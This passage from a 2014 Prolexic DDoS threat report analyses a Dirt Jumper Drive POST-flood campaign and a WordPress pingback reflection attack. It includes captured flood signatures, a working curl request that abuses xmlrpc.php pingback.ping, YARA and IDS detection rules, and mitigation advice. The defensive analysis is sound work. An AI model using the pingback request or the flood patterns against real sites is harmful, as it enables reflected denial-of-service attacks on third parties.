Prolexic Quarterly Global DDoS Attack Report Q1 2014 25.e..E...@.2.M...P..NY.9k...\.....~..Q.YPOST HTTP/1.1 Host: victim User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2;.NET CLR 2.0.546055;.NET CLR 3.5.546055;.NET CLR 3.0.546055 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Connection: Keep-Alive Referer: http://victim Content-Length: 2443 percent.z...9...p.- {o...}f.post HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Connection: Keep-Alive Referer: http://victim Content-Length: 2443 Content-Type: application/x-www-form-urlencoded.e..e...<@.6...m.p..\...3..9.ux... {o...}b.post HTTP/1.1 Host: victim User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2;.NET CLR 2.0.512775;.NET CLR 3.5.512775;.NET CLR 3.0.512775 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Connection: Keep-Alive Referer: http://victim Content-Length: 2443 Content-Type: application/x-www-form-urlencoded Figure 21: POST flood attack signatures observed in this campaign The YARA rule shown in Figure 22 was written by PLXsert in order to identify the Dirt Jumper Drive toolkit used during this campaign. YARA is an open source tool for identifying malware. Running the rule against a potential attack binary should return positive hits for dirtjumper_drive_variant, if any of the command strings or the POST flood payload is found in the executable.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 26 rule dirtjumper_drive_variant { strings: $cmd1 = -get fullword $cmd2 = -post1 fullword $cmd3 = -post2 fullword $cmd4 = -ip fullword $cmd5 = -ip2 fullword $cmd6 = udp fullword $cmd7 = -request fullword $cmd8 = -timeout fullword $cmd9 = -thread fullword $str1 = login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_ login_username=[50]&vb_login_md5password=[50] $str2 = Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 $str3 = Accept-Encoding: gzip,deflate } condition: 4 of ($cmd*) and all of ($str*) Figure 22: YARA rule for the detection of the Drive toolkit An example run of YARA 2.0 would return the result shown in Figure 23: yara -g ~/Desktop/dirtjumper_drive_variant.yar ~/samples/ dirtjumper_drive_variant [] /samples//drive.exe dirtjumper_drive_variant [] /samples//764436a7759df842cc660a726db74323c4c27a2741169c502ada70849345a ad9 Figure 23: The result from an example run of the YARA rule Visualization of sourced traffic The following graphics display visualizations by attack vector. As stated before, the main attack vectors for this campaign were NTP and DNS reflection and amplification, as well as an application layer attack in the form of POST request floods (identified as signatures of Drive). The top source countries for each attack type are shown below. Source countries of the DNS reflection attacks The majority of DNS reflectors were from the United States, followed by Russia and Brazil, as shown in Figure 24. The next countries in the top ten sources of DNS attack were Indonesia, Turkey, China, Netherlands, Australia, Canada and Germany.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 27 Figure 24: Top three source countries of the DNS reflection activity, based on a 12,718-source IP sample set Source countries for the NTP reflection attacks The NTP reflection sources originated from several countries. The three source countries with largest number of reflector servers used within this DDoS attack were South Korea, Russia and the Ukraine, as shown in Figure 25. The rest of top countries represented were the United States, China, Japan, Romania, Germany, Netherlands and Great Britain. Figure 25: Top 3 source countries of NTP reflection, based on a 5,175-source IP sample set

Prolexic Quarterly Global DDoS Attack Report Q1 2014 28 Source countries for POST attacks from the Drive toolkit The principal sources of the application layer attack type within this campaign were identified as the countries of Turkey, Iran and Argentina, as shown in Figure 26. The remaining top ten countries were identified as Brazil, Mexico, Venezuela, Russia, Spain, India and Poland. Figure 26: Top 3 source countries of Layer 7 POST attacks, based on a 5,922-source IP sample set PLXsert was able verify that the majority of sources from these countries match CPE device signatures. This suggests the source of the Dirt Jumper Drive attack traffic was compromised Microsoft Windowsbased computers behind home cable/dsl connections.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 29 Case study: A reflected application DDoS attack Overview The Prolexic Security Engineering and Response Team (PLXsert) has observed the abuse of the WordPress pingback function in recent DDoS attack campaigns. One of the attacks highlighted in this case study targeted an Internet media firm that is a customer of Prolexic (now part of Akamai). This reflected application attack vector exploits a vulnerability in the WordPress pingback function, identified by Common Vulnerabilities and Exposures CVE-2007-0540 in 2007. The pingback functionality, which has been available since WordPress version 2.1.3, is enabled by default in recent versions (3.5 and higher). WordPress applied fixes to validate source Uniform Resource Identifiers (URIs). However, this attempt to prevent potential DDoS attacks still allows attackers to abuse the pingback functionality by using reflection techniques. Characteristics of the WordPress DDoS pingback application reflection attack Pingback is an automated function that notifies website administrators when their posts or documents are linked by other websites, so they can track and manage references to their material. Attackers abuse this feature by crafting pingback requests that redirect the responses to the target of the malicious actor, overwhelming the target site with a flood of GET requests. The pingback functionality is important for those sites that depend upon syndication and content distribution. For those sites, turning this feature off is not usually an option. The main source of this vulnerability is found in the WordPress XML-RPC (XML remote procedure call) file: xmlrpc.php. XML-RPC is a set of specifications used to execute remote procedure calls transported via HTTP and encoded via XML. This allows the transmission and processing of data in disparate operating systems over the Internet. During these pingback DDoS attacks, malicious actors craft POST requests to an intermediary (victim) WordPress site. These POST requests are spoofed, so that they appear to come from the target site. The pingback response is then reflected to the target site. During an attack, hundreds of thousands of victim WordPress sites could be abused to generate pingback requests to the target site. (Learn more about reflection attacks in our DrDoS white paper series at www.prolexic.com/drdos.) Figure 27 shows the attack signature recorded from the targeted site. The signature has some specific items such as the User-Agent: WordPress(version) and the specification of the target domain in the Host: parameter.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 30 14:11:49.327562 IP x.x.x.x.48048 > x.x.x.x.80: Flags [P.], seq 1:111, ack 1, win 229, options [nop,nop,ts val 256538235 ecr 745511699], length 110 E...d@.@... d.*^f1!...p..v.w..u....jv{,o..get / HTTP/1.0 User-Agent: WordPress/3.8.1; http://victim-site Host: targetdomain Accept: */* Figure 27: WordPress pingback attack signature, as seen by the target Figure 28 shows the POST request, crafted in curl. This illustrates how the pingback attack is executed. A series of parameters had to be specified to generate the pingback response from the victim to the target. $ curl -D - http://victim/wordpress/xmlrpc.php -H Content-type: text/xml -d <methodcall> <methodname> pingback.ping </methodname> <params> <param> <value> <string> http://target-site </string> </value> </param> <param> <value> <string> http://vicitm/wordpress/?p=1 </string> </value> </param> </params> </methodcall> Figure 28: POST request sent to the victim to generate the pingback response to the target These parameters include (methodcall), (methodname), (string), (param), (params) and (value). After this request is crafted and executed, the victim server produces an HTTP 200 OK response, indicating the request was executed successfully (see Figure 29).

Prolexic Quarterly Global DDoS Attack Report Q1 2014 31 HTTP/1.1 200 OK Date: Thu, 13 Mar 2014 18:11:48 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Connection: close Content-Length: 370 Content-Type: text/xml; charset=utf-8 <?xml version= 1.0 encoding= UTF-8?> <methodresponse> <fault> <value> <struct> <member> <name>faultcode</name> <value><int>0</int></value> </member> <member> <name>faultstring</name> <value><string></string></value> </member> </struct> </value> </fault> </methodresponse> Figure 29: The HTTP 200 OK response indicates a successful request The effectiveness of this attack lies in the leveraging of victim WordPress websites that have pingback functionality enabled. This attack vector typically succeeds by exhausting the number of connections to the target site, rather than by overwhelming the target with bandwidth floods. Highlighted campaigns During Q1 2014, PLXsert observed two campaigns where the WordPress pingback attack was identified as the main attack vector. One of the campaigns was against an Internet media site and the second campaign was against a Prolexic/Akamai website. Campaign A (Internet media company) The first campaign peaked at approximately 50,000 connections per second and lasted nearly nine hours. The attack was based solely on the WordPress pingback attack vector. Through traffic inspection, we identified thousands of victim sites sending pingback responses to the targeted site.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 32 Attack Types: GET Flood Target Port: 80 Event Time Start: Mar 12, 2014 14:50:00 UTC Event Time End: Mar 13, 2014 02:48:15 UTC San Jose London Hong Kong Washington, DC Peak bits per second (bps) 8.82 Mbps 7.81 Mbps 1.89 Mbps 10.76 Mbps Peak packets per second (pps) 1.36 Kpps 2.50 Kpps 0.60 Kpps 4.89 Kpps Peak connections 8.61 Kcon 12.90 Kcon 4.05 Kcon 24.00 Kcon Figure 30: Campaign A attack traffic distribution by data center Figure 31: Global distribution of Campaign A connections Figure 32: Aggregated view of DDoS campaign over time When the targeted site is not powered by WordPress, DDoS mitigation is simpler. The WordPress pingback has a specific signature, and is highlighted Campaign B.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 33 Campaign B (A Prolexic/Akamai site) Campaign B peaked at approximately 60,000 connections per second and lasted approximately six hours. Attack Types: GET Flood Target Port: 80 Event Time Start: Mar 16, 2014 18:36:00 UTC Event Time End: Mar 17, 2014 00:33:13 UTC San Jose London Hong Kong Washington, DC Peak bits per second (bps) 1.10 Mbps 15.30 Mbps 670.00 Kbps 28.00 Mbps Peak packets per second (pps) 2.20 Kpps 29.00 Kpps 1.10 Kpps 55.00 Kpps Peak connections 14.19 Kcon 27.47 Kcon 7.14 Kcon 12.39 Kcon Figure 33: Campaign B attack traffic distribution by data center Figure 34: Global distribution of Campaign B connections

Prolexic Quarterly Global DDoS Attack Report Q1 2014 34 Recommended detection rules The IDS rules as shown in Figure 35 can be used to detect variants of the WordPress pingback attack vector against a target site. alert tcp $EXTERNAL_NET any -> $xxxx $HTTP_PORTS ( \ msg: action=block, custid=771, timeout=3600, comment= Comment ; sid: 10000001; \ content: User-Agent\: WordPress ; \ content: Host\: target-site 0d0a Accept\: */* ; ) alert tcp $EXTERNAL_NET any -> $xxxx $HTTP_PORTS ( \ msg: action=block, custid=771, timeout=3600, comment= Comment ; sid: 10000002; \ content: GET ; \ content: User-Agent\: WordPress ; \ content: Accept-Encoding\: deflate\;q=1.0, compress\;q=0.5 ; \ content: Host\: target-site ; ) alert tcp $EXTERNAL_NET any -> $xxxx $HTTP_PORTS ( \ msg: action=block, custid=771, timeout=3600, comment= Content ; sid: 10000003; \ content: GET ; \ content: User-Agent\: WordPress ; nocase; \ content: Host\: target-site ; ) Figure 35: IDS rules for WordPress pingback attack detection Conclusion The WordPress pingback attack is not a new type of attack. It has been in the wild for many years and has recently regained popularity. This attack method is being observed in standalone campaigns as well as in multi-vector DDoS attack campaigns. The main driver behind this type of attack is the failure to prevent the abuse of the pingback feature in the WordPress suite. Unless a WordPress website requires the use of remote posting capabilities, trackbacks or pingbacks from other sites, administrators are strongly encouraged to disable the pingback feature For many WordPress sites, however, the ability to manage, track and distribute content syndication is a critical measure of their Internet reach. To create an environment more conducive to DDoS mitigation, WordPress sites would need to implement tracking technologies other than pingback, which would require an additional investment of time, money and resources to determine how their content is syndicated and distributed to subscribers. For WordPress sites under DDoS attack for which pingback is deemed essential and for which no alternate tracking technology has been proactively implemented, the DDoS mitigation challenge is daunting but managed well by specialized DDoS mitigation providers such as Prolexic.

Prolexic Quarterly Global DDoS Attack Report Q1 2014 35 Looking forward Some specific trends identified this quarter hint at the direction of future DDoS attack campaigns. First, among attack vectors that rely on reflection and amplification techniques, NTP and DNS floods have supplanted the use of CHARGEN. The driving force in this trend is the creation of tools that allow malicious actors to perform more damaging attacks with fewer resources, and significant numbers of open/misconfigured DNS and NTP servers. As reported in the Q4 2013 Global DDoS Attack Report, Asia continues to play a significant role as a source of DDoS attacks, driven by factors such as exponential growth of Internet usage, IT infrastructure mismanagement, rampant software piracy and a growing crime ecosystem. Community efforts are in place to reduce these numbers, but malicious actors will use what remains available and take advantage of the situation. For example, we have observed campaigns where rogue DNS servers were created purposefully to generate a larger DNS response, resulting in greater amplification. These trends are reinforced by a more than 16 percent increase in NTP amplification attacks and a sustained percentage of DNS attacks throughout Q1, Q4 2013 and Q1 2014. In a laboratory environment, PLXsert analyzed and replicated a 1:50 amplification ratio using the DNS Flooder v1.1 toolkit and an increase of more 367 percent in packet response using the NTP-AMP tool. It is clear what is driving the creation of these tools. PLXsert believes the development of newer tools that increase the damage of DDoS attacks while using fewer resources will continue. In addition, PLXsert expects the use of attack automation, the DDoS market for hire, and mix-and-match multi-vector attack techniques will continue. PLXsert has also observed the use and reuse of the Dirt Jumper Drive variant. This versatile crime ware kit is becoming as prevalent as the Zeus crime ware kit in the DDoS threatscape. Malicious actors are continuing to use this kit by re-obfuscating and modifying payloads to avoid detection. This crime ware kit can produce layer 3 and layer 7 attacks, and allows malicious actors to engage in flexible campaigns where attack vectors can be switched on demand, depending on a defender s actions. Campaigns where attackers take a mix-and-match approach while observing and adapting to mitigation responses are becoming more frequent. Multi-vector attacks require higher skill levels as well as multiple and distinct sources and tools available to attackers. These new campaigns are incorporating mobile devices and application-based reflection techniques such as the recently recycled WordPress pingback DDoS attack. History shows that any protocol or application misconfiguration that can be used for DDoS purposes will be effectively incorporated and monetized into the DDoS threatscape. As always, it is essential to continue the cleanup efforts to deny resources to attackers. The DDoS threatscape is entering a phase where specific verticals are being targeted with more sophisticated and adaptive attack campaigns that require a real-time mitigation response. Mix-and-match, hit-watch-and-switch adaptive DDoS campaigns will move the DDoS threatscape into an arena where technology itself will be insufficient to mitigate attacks. Instead, successful DDoS protection will require a combination of highly skilled defenders and best-of-breed mitigation technology to mitigate these attacks effectively.

About Prolexic Security Engineering & Response Team (PLXsert) PLXsert monitors malicious cyber threats globally and analyzes DDoS attacks using proprietary techniques and equipment. Through digital forensics and post-attack analysis, PLXsert is able to build a global view of DDoS attacks, which is shared with customers and the security community. By identifying the sources and associated attributes of individual attacks, the PLXsert team helps organizations adopt best practices and make more informed, proactive decisions about DDoS threats. About Prolexic Prolexic, now part of Akamai, offers DDoS protection solutions that leverage proprietary DDoS filtering techniques and the world s largest cloud-based DDoS mitigation network. Akamai completed the acquisition of Prolexic in February 2014. Together with Prolexic, Akamai is providing customers with a comprehensive portfolio of security solutions designed to defend an enterprise s Web and IP infrastructure against application-layer, network-layer and data center attacks delivered via the Internet. To learn more about how Prolexic solutions stop DDoS attacks and protect business, please visit www.prolexic.com, follow us on LinkedIn, Facebook, Google+, YouTube, and @Prolexic on Twitter. 2014 Prolexic Technologies., Inc. All rights reserved. v.041614